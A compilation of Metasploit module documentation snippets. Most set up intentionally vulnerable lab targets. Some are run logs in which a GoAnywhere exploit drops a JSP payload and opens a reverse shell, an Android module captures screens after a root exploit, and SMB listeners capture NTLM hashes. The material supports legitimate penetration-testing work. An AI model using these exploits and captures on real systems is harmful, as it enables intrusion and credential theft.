### Install and Start FTP Server (vsftpd) Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md Installs vsftpd and ensures it starts automatically on boot. ```bash sudo apt install -y vsftpd sudo systemctl start vsftpd sudo systemctl enable vsftpd ``` -------------------------------- ### Install and Start Apache Web Server Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md Installs Apache2 and ensures it starts automatically on boot. ```bash sudo apt install -y apache2 sudo systemctl start apache2 sudo systemctl enable apache2 ``` -------------------------------- ### Ubuntu Setup: Start CouchDB Server Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md Starts the CouchDB server as the 'couchdb' user. ```bash sudo -i -u couchdb couchdb/bin/couchdb ``` -------------------------------- ### GoAhead Installation and Setup Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/goahead_ldpreload.md These commands outline the steps to clone the GoAhead repository, checkout a specific vulnerable version, compile it, and start the server for testing. ```bash git clone https://github.com/embedthis/goahead.git cd goahead/ git checkout tags/v3.6.4 -q make > /dev/null cd test gcc ./cgitest.c -o cgi-bin/cgitest ../build/linux-x64-default/bin/goahead . 127.1.1.1:8080 ``` -------------------------------- ### UniData Installation and Service Start Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/unidata_udadmin_password_stack_overflow.md Demonstrates the steps to install UniData from a zip file, extract the tar archive, and set up environment variables to run the service. ```bash [ron@unidata unidata]$ unzip Unidata\ Personal\ X86_8.2.4.3001.zip Archive: Unidata Personal X86_8.2.4.3001.zip inflating: bin.tar inflating: UniData_Hotfix_V824_3001.pdf inflating: UniData_Release_Notes_v824.pdf [ron@unidata unidata]$ tar -xf bin.tar [ron@unidata unidata]$ sudo ./udtsetup [default options, set directories] CheckLang Yes CheckPerms No Group sys InstallXDEMO Yes LibDir /home/ron/unidata/unidata/lib Startud Yes UdtBin /home/ron/unidata/unidata/bin UdtHome /home/ron/unidata/unidata UnisharedDir /home/ron/unidata/unishared WorkDir /home/ron/unidata/unidata/work ``` ```bash # export UDTBIN=/home/ron/unidata/unidata/bin # export UDTHOME=/home/ron/unidata/unidata # export PATH=$PATH:$UDTBIN # export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$UDTBIN # export LANG=C # startud ``` -------------------------------- ### Start minikube Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/eclipse_che_machine_exec_rce.md Starts a minikube instance with specified resources. This command requires minikube to be installed. ```bash minikube start --driver=docker \ --memory=4096 \ --cpus=2 \ --disk-size=20g ``` -------------------------------- ### Start Metasploit Database and Web Service Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/Metasploit-Web-Service.md Use this command to start both the Metasploit database and the web service. This is typically done during initial setup. ```bash msfdb start ``` -------------------------------- ### Ubuntu Setup: Install Dependencies Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md Installs necessary packages for building and running CouchDB on Ubuntu. ```bash sudo apt-get --no-install-recommends -y install \ build-essential pkg-config erlang erlang-reltool \ libicu-dev libmozjs-68-dev python3 sudo apt-get -y install pip sphinx-doc sphinx-common sudo pip install --upgrade sphinx_rtd_theme nose requests hypothesis ``` -------------------------------- ### Start Jenkins Server Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/jenkins_cli_deserialization.md To start a Jenkins server, navigate to the location of the downloaded `war` file and execute this command. A JDK must be installed on the target system. ```bash java -jar .war ``` -------------------------------- ### ViciBox Installer Output Example Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/vicidial_sql_enum_users_pass.md This output shows the interactive prompts and system responses during the ViciBox installation process. It highlights configuration choices, potential warnings, and the final summary. ```bash vicibox11:~ # vicibox-install --legacy ViciBox Installer Legacy mode activated Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137. Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138. Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137. Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138. The installer will ask questions based upon the role that this server is to provide for the ViciBox Call Center Suite. You should have the database and optionally archive servers setup prior to installing any other servers. The installer will not run without there being a configured database! If this server is to be the database then it must be installed before the archive server. Verify that all servers are connected to the same network and have connectivity to each other before continuing. This installer will be destructive to the server if it is run. Do you want to continue with the ViciBox install? [y/N] : y Do you want to enable expert installation? [y/N] : The Internal IP address found was 192.168.1.4. Do you want to use this IP address for ViciDial? [Y/n] : y Will this server be used as the Database? [y/N] : y Do you want to use the default ViciDial DB settings? [Y/n] : y Will this server be used as a Web server? [y/N] : y Will this server be used as a Telephony server? [y/N] : y Will this server be used as an Archive server? [y/N] : y Archive server IP (192.168.1.4) : Archive FTP User (cronarchive) : Archive FTP Password (archive1234) : Archive FTP Port (21) : Archive FTP Directory () : Archive URL (http://192.168.1.4/archive/) : Use of uninitialized value $localsvn in concatenation (.) or string at /usr/local/bin/vicibox-install line 1513, line 14. The local SVN is build 240419-1817 version 2.14-916a from SVN Do you want to use the ViciDial version listed above? [Y/n] : y Do you want to disable the built-in firewall? [y/N] : y --- ViciBox Install Summary --- Expert : No Legacy : Yes Database : Yes Web : Yes Telephony: Yes First Srv: Yes Have Arch: No Archive : Yes Firewall : Disabled --- Configuration Information --- - Database - Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 1609, line 16. SVN Rev : IP Addr : 192.168.1.4 Name : asterisk User : cron Password : 1234 Cust User: custom Cust Pass: custom1234 Port : 3306 Please verify the above information before continuing! Do you want to continue the installation? [y/N] : y Beginning installation, expect lots of output... Disabling firewall... Removed /etc/systemd/system/multi-user.target.wants/firewalld.service. Removed /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service. Use of uninitialized value $DBsvnrev in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, line 17. Use of uninitialized value $localsvn in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, line 17. Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 218, line 17. Local SVN revision matches DB revision: Doing general DataBase requirements... Doing Master-specific MySQL setup... Configuring Web Server... Created symlink /etc/systemd/system/httpd.service → /usr/lib/systemd/system/apache2.service. Created symlink /etc/systemd/system/apache.service → /usr/lib/systemd/system/apache2.service. Created symlink /etc/systemd/system/multi-user.target.wants/apache2.service → /usr/lib/systemd/system/apache2.service. Configuring Telephony Server... Configuring Archive Server... Nouveau mot de passe : MOT DE PASSE INCORRECT : trop simple/systématique Retapez le nouveau mot de passe : passwd: password updated successfully Created symlink /etc/systemd/system/multi-user.target.wants/vsftpd.service → /usr/lib/systemd/system/vsftpd.service. Loading GMT and Phone Codes... Seeding the audio store, this may take a while... PLEASE use secure passwords inside vicidial. It prevents hackers and other undesirables from compromising your system and costing you thousands in toll fraud and long distance. A secure password Contains at least one capital letter and one number. A good example of a secure password would be NrWZDqL1Rg37uuC. Don't feed the black market, secure your systems properly! System should be installed. Please type 'reboot' to cleanly load everything. ``` -------------------------------- ### Trixbox CE Installation and Setup Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md Instructions for setting up a vulnerable Trixbox CE environment for testing. This includes downloading the ISO, installing it on a virtual machine, and accessing the web GUI. ```bash CentOS release 4.3 (Final) Kernel 2.6.9-34.EL on an i686 asterisk1 login: ``` ```bash For access to the trixbox web GUI use this URL: http://192.168.205.144 ``` -------------------------------- ### Kaltura Installation Prompts Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md This example displays the interactive prompts encountered during a Kaltura installation. It shows the various configuration options that need to be provided, some of which could be leveraged in an exploit. ```bash [Email\NO]: "" CDN hostname [kalrpm.lcl]: "" Apache virtual hostname [kalrpm.lcl]: "" Which port will this Vhost listen on [80]?: DB hostname [127.0.0.1]: "<127.0.0.1>" DB port [3306]: "<3306>" MySQL super user [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "" MySQL super user passwd [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: "" Analytics DB hostname [127.0.0.1]: "<127.0.0.1>" Analytics DB port [3306]: "<3306>" Sphinx hostname [127.0.0.1]: "<127.0.0.1>" Secondary Sphinx hostname: [leave empty if none] "" VOD packager hostname [kalrpm.lcl]: "" VOD packager port to listen on [88]: Service URL [http://kalrpm.lcl:80]: "" Kaltura Admin user (email address): "" Admin user login password (must be minimum 8 chars and include at least one of each: upper-case, lower-case, number and a special character): "" Confirm passwd: "" Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: "" How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? "" Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: "" 'Contact us' phone number [+1 800 871 5224]? "" Is your Apache working with SSL?[Y/n] "" It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] "" Which port will this Vhost listen on? [80] "<80>" Please select one of the following options [0]: "<0>" ``` -------------------------------- ### Retrieve Install Key Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/linux/gather/rancher_audit_log_leak.md After starting the Rancher Docker container, use this command to retrieve the bootstrap password, which is necessary for initial setup. ```bash docker logs 2>&1 | grep "Bootstrap Password:" ``` -------------------------------- ### Vagrant Project Setup and VM Boot Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout.md This example demonstrates the basic commands to initialize a Vagrant project and bring up a virtual machine. It shows the output of the `vagrant up` command, including box download, VM import, network configuration, and shared folder mounting. ```bash $ mkdir vagrant_getting_started $ cd vagrant_getting_started/ $ vagrant init hashicorp/bionic64 A `Vagrantfile` has been placed in this directory. You are now ready to `vagrant up` your first virtual environment! Please read the comments in the Vagrantfile as well as documentation on `vagrantup.com` for more information on using Vagrant. $ vagrant up Bringing machine 'default' up with 'virtualbox' provider... ==> default: Box 'hashicorp/bionic64' could not be found. Attempting to find and install... default: Box Provider: virtualbox default: Box Version: >= 0 ==> default: Loading metadata for box 'hashicorp/bionic64' default: URL: https://vagrantcloud.com/hashicorp/bionic64 ==> default: Adding box 'hashicorp/bionic64' (v1.0.282) for provider: virtualbox default: Downloading: https://vagrantcloud.com/hashicorp/boxes/bionic64/versions/1.0.282/providers/virtualbox.box ==> default: Successfully added box 'hashicorp/bionic64' (v1.0.282) for 'virtualbox'! ==> default: Importing base box 'hashicorp/bionic64'... ==> default: Matching MAC address for NAT networking... ==> default: Checking if box 'hashicorp/bionic64' version '1.0.282' is up to date... ==> default: Setting the name of the VM: vagrant_getting_started_default_1664845773160_64119 ==> default: Clearing any previously set network interfaces... ==> default: Preparing network interfaces based on configuration... default: Adapter 1: nat ==> default: Forwarding ports... default: 22 (guest) => 2222 (host) (adapter 1) ==> default: Booting VM... ==> default: Waiting for machine to boot. This may take a few minutes... default: SSH address: 127.0.0.1:2222 default: SSH username: vagrant default: SSH auth method: private key default: Warning: Connection reset. Retrying... default: default: Vagrant insecure key detected. Vagrant will automatically replace default: this with a newly generated keypair for better security. default: default: Inserting generated public key within guest... default: Removing insecure key from the guest if it's present... default: Key inserted! Disconnecting and reconnecting using new SSH key... ==> default: Machine booted and ready! ==> default: Checking for guest additions in VM... default: The guest additions on this VM do not match the installed version of default: VirtualBox! In most cases this is fine, but in rare cases it can default: prevent things such as shared folders from working properly. If you see default: shared folder errors, please make sure the guest additions within the default: virtual machine match the version of VirtualBox you have installed on default: your host and reload your VM. default: default: Guest Additions Version: 6.0.10 default: VirtualBox Version: 6.1 ==> default: Mounting shared folders... default: /vagrant => /home/user/vagrant/vagrant_getting_started ``` -------------------------------- ### Setup and Exploit Execution Script Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wp_ai_engine_mcp_rce.md This bash script automates the setup process, including starting Docker containers, installing WP-CLI, configuring WordPress, and activating the AI Engine plugin with a generated bearer token. ```bash docker compose up -d sleep 5 docker exec wp-ai-engine-lab bash -c "curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && chmod +x wp-cli.phar && mv wp-cli.phar /usr/local/bin/wp" docker exec wp-ai-engine-lab wp core install --path='/var/www/html' --url='http://localhost:5555' --title='Exploit Market' --admin_user='admin' --admin_password='admin' --admin_email='admin@example.com' --allow-root docker exec wp-ai-engine-lab wp rewrite structure '/%postname%/' --path='/var/www/html' --allow-root docker exec wp-ai-engine-lab wp rewrite flush --path='/var/www/html' --allow-root docker exec wp-ai-engine-lab wp config set FS_METHOD direct --path='/var/www/html' --allow-root docker exec wp-ai-engine-lab chown -R www-data:www-data /var/www/html/wp-content docker exec -u www-data wp-ai-engine-lab wp plugin install ai-engine --version=3.1.3 --path='/var/www/html' --activate --force BEARER_TOKEN=$(openssl rand -base64 32 | tr -d "=+/" | cut -c1-43) docker exec -u www-data wp-ai-engine-lab wp option update mwai_options --format=json --path='/var/www/html' "{""module_mcp"":true,""mcp_core"":true,""mcp_bearer_token"":"${BEARER_TOKEN}"",""mcp_noauth_url"":true}" echo "Bearer Token: ${BEARER_TOKEN}" ``` -------------------------------- ### Set up web server directory Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md Install PHP and Apache, create a world-writable directory for the web server. ```sh sudo apt install php apache2 sudo mkdir /home/var/www/html/test sudo chmod 777 /var/www/html/test ``` -------------------------------- ### Setup SPIP Directory and Unzip Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/spip_connect_exec.md Create a directory for SPIP, copy the archive, and unzip it. ```bash mkdir spip-site cp SPIP-v2-0-0.zip spip-site/ cd spip-site/ unzip SPIP-v2-0-0.zip ``` -------------------------------- ### Ray Installation and Docker Setup Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/ray_agent_job_rce.md Steps to install and run the vulnerable Ray v2.6.3 using Docker. This involves pulling the specific Docker image and starting the Ray container with appropriate port mappings and shared memory size. ```bash docker pull rayproject/ray:2.6.3 ``` ```bash docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3 ``` ```bash ray start --head --dashboard-host=0.0.0.0 ``` -------------------------------- ### Full Python Metasploit Module Example Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/Writing-External-Python-Modules.md This example demonstrates a complete Python module for Metasploit, including metadata definition, dependency checking for the 'requests' library, and the 'run' function to perform an HTTP GET request and log the response. It requires the 'requests' library to be installed. ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- # standard modules import logging # extra modules dependencies_missing = False try: import requests except ImportError: dependencies_missing = True from metasploit import module metadata = { 'name': 'Python Module Example', 'description': ''' Python communication with msfconsole. ''', 'authors': [ 'Jacob Robles' ], 'date': '2018-03-22', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://blog.rapid7.com/2017/12/28/regifting-python-in-metasploit/'}, {'type': 'aka', 'ref': 'Coldstone'} ], 'type': 'single_scanner', 'options': { 'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'}, 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None} } } def run(args): module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) if dependencies_missing: logging.error('Module dependency (requests) is missing, cannot continue') return # Your code here try: r = requests.get('https://{}/{}'.format(args['rhost'], args['targeturi']), verify=False) except requests.exceptions.RequestException as e: logging.error('{}'.format(e)) return logging.info('{}...'.format(r.text[0:50])) if __name__ == '__main__': module.run(metadata, run) ``` -------------------------------- ### PivotX Installation Steps Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/pivotx_index_php_overwrite.md Follow these steps to install PivotX and prepare the environment for exploitation. ```bash git clone https://github.com/pivotx/PivotX.git ``` ```bash sudo chown -R www-data:www-data ./ ``` -------------------------------- ### Example bootparams file configuration Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md This is an example of how the `/etc/bootparams` file should be configured on a server to provide boot information to clients. ```plaintext clientname root=nfsserver:/export/clientname/root ``` -------------------------------- ### Setup Vulnerable Craft CMS with DDEV Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/craftcms_ftp_template.md This script uses DDEV to configure and start a Craft CMS project, install a specific vulnerable version (5.5.0), set up the security key, install Craft CMS with default credentials, and enable 'register_argc_argv' for PHP. It then restarts DDEV and launches the project. ```bash mkdir exploit-craft && \ cd exploit-craft && \ # Configure DDEV (https://ddev.com/) project for Craft CMS \ ddev config \ --project-type=craftcms \ --docroot=web \ --create-docroot \ --php-version="8.2" \ --database="mysql:8.0" \ --nodejs-version="20" && \ # Create the DDEV project ddev start -y && \ # Create Craft CMS with the specified version ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \ # Install a vulnerable Craft CMS version ddev composer require "craftcms/cms:5.5.0" \ --no-scripts \ --no-interaction --with-all-dependencies && \ # Set the security key for Craft CMS ddev craft setup/security-key && \ # Install Craft CMS ddev craft install/craft \ --username=admin \ --password=password123 \ --email=admin@example.com \ --site-name=Testsite \ --language=en \ --site-url='$DDEV_PRIMARY_URL' && \ # Enable register_argc_argv for PHP mkdir -p .ddev/php/ && \ echo "register_argc_argv = On" > .ddev/php/php.ini && \ ddev restart && \ # Launch the project echo 'Setup complete. Launching the project.' && \ ddev launch ``` -------------------------------- ### Start Splunk Service Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md Start the Splunk Enterprise service after installation. This command assumes the default installation path. ```bash /opt/splunk/bin/splunk start ``` -------------------------------- ### Running the GetGo Exploit Module Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md This example shows how to initiate the exploit module and the expected output when it starts, including the generated URL and server status. ```bash msf exploit(windows/browser/getgodm_http_response_bof) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.12:4444 msf exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 [*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3 [*] Server started. ``` -------------------------------- ### HTTP GET Request Example Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/title.md An example of an HTTP GET request sent to a web server, including standard headers. ```http GET / HTTP/1.1 Host: 172.17.0.2 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` -------------------------------- ### Example of Running the Module Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/android/capture/screen.md This scenario demonstrates the typical workflow of gaining root access and then running the screen capture module. The output shows the session being backgrounded, the module being used, and the screenshot being saved. ```msfconsole msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Using target: New Samsung [*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt [*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting [*] Waiting 300 seconds for payload [*] Sending stage (904600 bytes) to 222.222.2.222 [*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400 meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > background [*] Backgrounding session 4... msf exploit(android/local/futex_requeue) > use post/android/capture/screen msf post(android/capture/screen) > set session 4 session => 4 msf post(android/capture/screen) > run [!] SESSION may not be compatible with this module. [+] Downloading screenshot... [+] Screenshot saved at /root/.msf4/loot/20191022161242_default_222.222.2.222_screen_capture.s_496457.png [*] Post module execution completed ``` -------------------------------- ### Install and Start Memcached on CentOS Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md Installs and starts the memcached service on a CentOS 7 system. It listens on 0.0.0.0 by default, making it accessible externally. ```bash yum -y install memcached systemctl start memcached ``` -------------------------------- ### Setting up SMB Capture Server Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/fileformat/odt_badodt.md Shows how to start the Metasploit auxiliary/server/capture/smb module to listen for and capture NTLM hashes. ```bash $ sudo ./msfconsole msf > use auxiliary/server/capture/smb msf auxiliary(server/capture/smb) > run [*] Auxiliary module running as background job 0. msf auxiliary(server/capture/smb) > [*] Server started. msf auxiliary(server/capture/smb) > ``` -------------------------------- ### Install PostgreSQL and Client Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md Installs the PostgreSQL server and client packages on Debian-based systems. It also starts the PostgreSQL service and configures it to start on boot. ```bash sudo apt update && sudo apt-get install -y postgresql postgresql-client sudo service postgresql start && sudo update-rc.d postgresql enable ``` -------------------------------- ### Set Up SMB Capture Listener Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/fileformat/environment_variable_datablock_leak.md This example shows how to configure and start an SMB capture listener on the attacker machine. This listener will be used to capture the NTLM hashes when the victim interacts with the malicious LNK file. ```bash msf > use auxiliary/server/capture/smb msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25 SRVHOST => 192.168.1.25 msf auxiliary(server/capture/smb) > run [*] Server started. ``` -------------------------------- ### Install MySQL Server on Ubuntu Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/suite_crm_export_sqli.md Installs and starts the MySQL server on Ubuntu 20.04. This is a prerequisite for installing SuiteCRM from source. ```bash sudo apt update sudo apt install mysql-server sudo systemctl start mysql.service ``` -------------------------------- ### Install MySQL 5.7 Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md Installs MySQL 5.7 on Ubuntu. The service should start automatically. ```bash sudo apt -y install mysql-server-5.7 sudo systemctl start mysql ``` -------------------------------- ### ClipBucket Installation Steps Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md These commands detail the steps to download, unzip, and configure ClipBucket for exploitation. ```bash wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ``` ```bash unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ``` ```bash mv clipbucket-4881/upload/* /var/www/html/ ``` ```bash chown -R www-data:www-data /var/www/html/ ``` -------------------------------- ### PlaySMS Installation Steps Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/playsms_template_injection.md Follow these steps to set up a vulnerable instance of PlaySMS. This includes downloading, extracting, configuring, and setting database credentials. ```bash tar -xvf playsms-1.4.2.tar.gz ``` ```bash mv playsms-1.4.2/web/* /var/www/html/ ``` ```bash cp /var/www/html/config-dist.php /var/www/html/config.php ``` ```bash chown -R www-data:www-data /var/www/html/ ``` -------------------------------- ### Install PHP Dependencies on Ubuntu Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md Installs necessary PHP extensions and MariaDB for GLPI. Ensure these are installed before proceeding with the GLPI setup. ```bash sudo add-apt-repository ppa:ondrej/php sudo apt install apache2 php8.3 php8.3-curl php8.3-zip php8.3-gd php8.3-intl \ php8.3-intl php-pear php8.3-imagick php-bz2 php8.3-imap php-memcache php8.3-pspell \ php8.3-tidy php8.3-xmlrpc php8.3-xsl php8.3-mbstring php8.3-ldap php-cas php-apcu \ libapache2-mod-php8.3 php8.3-mysql mariadb-server ``` -------------------------------- ### Installing UniData with Default Options Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/unidata_udadmin_auth_bypass.md Shows the interactive installation process for UniData using default options. ```bash sudo ./udtsetup [default options, set directories] CheckLang Yes CheckPerms No Group sys InstallXDEMO Yes LibDir /home/ron/unidata/unidata/lib Startud Yes UdtBin /home/ron/unidata/unidata/bin UdtHome /home/ron/unidata/unidata UnisharedDir /home/ron/unidata/unishared WorkDir /home/ron/unidata/unidata/work ``` -------------------------------- ### Module Options and Execution Example Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204.md Demonstrates the module's options, including RHOSTS, RPORT, SSL, TARGETURI, and payload options like LHOST and LPORT. Shows the output of the 'check' and 'exploit' commands, including successful account creation, OS detection, payload drop, and shell session opening. ```bash msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.100.1.30 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta sploit.html RPORT 8001 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /goanywhere/ yes The base path to the web application VHOST no HTTP server virtual host Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.100.1.10 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port SHELL no The system shell to use. Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check [*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0 msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit [*] Started reverse TCP handler on 10.100.1.10:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0 [*] Created account: uchvkpgt:ZindpxggDdvtrxu3 [*] Automatic targeting, detected OS: Linux [*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere [*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp [+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp [!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result [+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/ [*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000 id uid=1002(gamft) gid=1002(gamft) groups=1002(gamft) pwd /opt/HelpSystems/GoAnywhere uname -a Linux ubuntu-test-vm 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux exit [*] 10.100.1.30 - Command shell session 8 closed. msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > ``` -------------------------------- ### Install WordPress Core Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wp_acf_extended_rce.md Installs WordPress core files and sets up the initial site using WP-CLI. ```bash docker exec wp-acf-extended-lab wp core install \ --path='/var/www/html' \ --url='http://localhost:5557' \ --title='Exploit Market' \ --admin_user='admin' \ --admin_password='admin' \ --admin_email='admin@example.com' \ --allow-root ``` -------------------------------- ### Vagrantfile for Wing FTP Server Lab Setup Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wingftp_null_byte_rce.md This Vagrantfile provisions a Debian VM, installs Wing FTP Server 7.4.3, and configures port forwarding for access. It automates the installation and initial setup of the server. ```ruby Vagrant.configure("2") do |config| config.vm.box = "debian/bookworm64" if Vagrant.has_plugin?("vagrant-vbguest") config.vbguest.auto_update = false end { 21 => 2121, # FTP 990 => 2990, # FTPS 5466 => 5466, # Admin port WingFTP 50000 => 50000, # Passive FTP range start 50050 => 50050, # Passive FTP range end 80 => 8081 # HTTP WingFTP Web GUI }.each do |guest, host| config.vm.network "forwarded_port", guest: guest, host: host, host_ip: "0.0.0.0", auto_correct: true end config.vm.provision "shell", inline: <<-SHELL #!/usr/bin/env bash set -e ADMIN_USER="admin" ADMIN_PASS="adminadmin" ADMIN_PORT="5466" WFTP_URL="https://web.archive.org/web/20250108084555/https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz" apt-get update DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ wget ca-certificates libssl3 libpam0g libacl1 libcap2 \ net-tools procps expect curl \ linux-headers-amd64 build-essential dkms mkdir -p /opt/wingftp cd /opt/wingftp wget -qO wftp.tar.gz "$WFTP_URL" tar xzf wftp.tar.gz --strip-components=1 rm wftp.tar.gz chmod +x setup.sh expect -c " spawn /opt/wingftp/setup.sh expect \"Enter your administrator name:\" { send \"${ADMIN_USER}\r\" } expect \"Enter your administrator password:\" { send \"${ADMIN_PASS}\r\" } expect \"Enter your administrator password:\" { send \"${ADMIN_PASS}\r\" } expect \"Enter the listener port\" { send \"${ADMIN_PORT}\r\" } expect \"Do you want to start Wing FTP Server now?\" { send \"y\r\" } expect eof " systemctl daemon-reload systemctl enable wftpserver.service 